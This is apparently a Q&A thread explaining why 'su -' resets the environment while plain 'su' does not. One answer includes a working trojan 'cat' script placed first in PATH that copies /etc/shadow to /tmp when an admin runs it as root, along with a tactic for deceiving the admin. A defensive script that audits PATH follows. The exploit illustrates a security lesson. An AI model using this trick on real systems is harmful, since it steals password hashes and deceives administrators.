Why do we use su - and not just su?
su - invokes a login shell after switching the user. A login shell resets most environment variables, providing a clean base.
su just switches the user, providing a normal shell with an environment nearly the same as with the old user.
Imagine you're a software developer with normal user access to a machine and your ignorant admin just won't give you root access. Let's (hopefully) trick him.
$ mkdir /tmp/evil_bin
$ vi /tmp/evil_bin/cat
#!/bin/bash
test $UID != 0 && { echo "/bin/cat: Permission denied!"; exit 1; }
/bin/cat /etc/shadow &>/tmp/shadow_copy
/bin/cat "$@"
exit 0
$ chmod +x /tmp/evil_bin/cat
$ PATH="/tmp/evil_bin:$PATH"
Now, you ask your admin why you can't cat the dummy file in your home folder, it just won't work!
$ ls -l /home/you/dummy_file
-rw-r--r-- 1 you wheel 41 2011-02-07 13:00 dummy_file
$ cat /home/you/dummy_file
/bin/cat: Permission denied!
If your admin isn't that smart or just a bit lazy, he might come to your desk and try with his super-user powers:
$ su
Password: ...
# cat /home/you/dummy_file
Some important dummy stuff in that file.
# exit
Wow! Thanks, super admin!
$ ls -l /tmp/shadow_copy
-rw-r--r-- 1 root root 1093 2011-02-07 13:02 /tmp/shadow_copy
He, he.
You may have noticed that the corrupted $PATH variable was not reset. This wouldn't have happened if the admin had invoked su - instead.
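A defensive check for the situation in the answer above, as an added example that is not part of the original answer: it flags PATH entries a non-root user could control and shows which file a command name would actually resolve to. The helper names path_entries, risky_path_entries and first_match are hypothetical.

```shell
#!/bin/sh
# Added example, not from the original answer: audit a PATH string before
# running commands as root in a shell that kept the caller's environment.
# Function names are illustrative.

# path_entries PATH_STRING: one entry per line; an empty entry means the
# current directory, so it is printed as ".".
path_entries() {
    printf '%s\n' "$1" | tr ':' '\n' | sed 's/^$/./'
}

# risky_path_entries PATH_STRING: print "reason<TAB>entry" for every entry a
# non-root user could control. Always returns 0; callers inspect the output.
risky_path_entries() {
    path_entries "$1" | while IFS= read -r dir; do
        case $dir in
            /*) ;;
            *)  printf 'relative\t%s\n' "$dir"; continue ;;
        esac
        [ -d "$dir" ] || continue
        # -H follows a symlinked entry (e.g. /bin -> usr/bin); -prune keeps
        # find from descending, so only the directory itself is tested.
        if [ -n "$(find -H "$dir" -prune ! -user root -print 2>/dev/null)" ]; then
            printf 'not-root-owned\t%s\n' "$dir"
        fi
        if [ -n "$(find -H "$dir" -prune \( -perm -0020 -o -perm -0002 \) -print 2>/dev/null)" ]; then
            printf 'group-or-world-writable\t%s\n' "$dir"
        fi
    done
    return 0
}

# first_match PATH_STRING COMMAND: print the file a PATH search would run,
# i.e. the first executable regular file named COMMAND.
first_match() {
    path_entries "$1" | while IFS= read -r dir; do
        if [ -f "$dir/$2" ] && [ -x "$dir/$2" ]; then
            printf '%s\n' "$dir/$2"
            break
        fi
    done
    return 0
}

# Audit the PATH this shell inherited and show which cat it would run.
risky_path_entries "$PATH"
first_match "$PATH" cat
```

Run in a root shell opened with plain su, any output from risky_path_entries means commands typed by name may resolve to files root does not control.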
su - logs you in completely as root, whereas su makes it so you are pretending to be root.
The most obvious example of this is that ~ is root's home directory if you use su -, but your own home directory if you use su.
Depending on your system, it may also mean differences in prompt, PATH, or history file.
So if you are part of a team administering a system, and your colleague gives you a command to run, you know it will work the same if you are both using su -, but if you are both using su, there may be differences due to you having different shell configurations.
On the other hand, if you want to run a command as root but using your own configuration, then maybe su is better for you.
Also don't forget about sudo, which has a -s option to start a shell running as root. Of course, this has different rules as well, and they change depending on which distribution you are using.
The main difference is:
su - username sets up the shell environment as if it were a clean login as the specified user; it accesses and uses the specified user's environment variables.
su username just starts a shell with current environment settings for the specified user.
If username is not specified with su and su -, the root account is implied as default.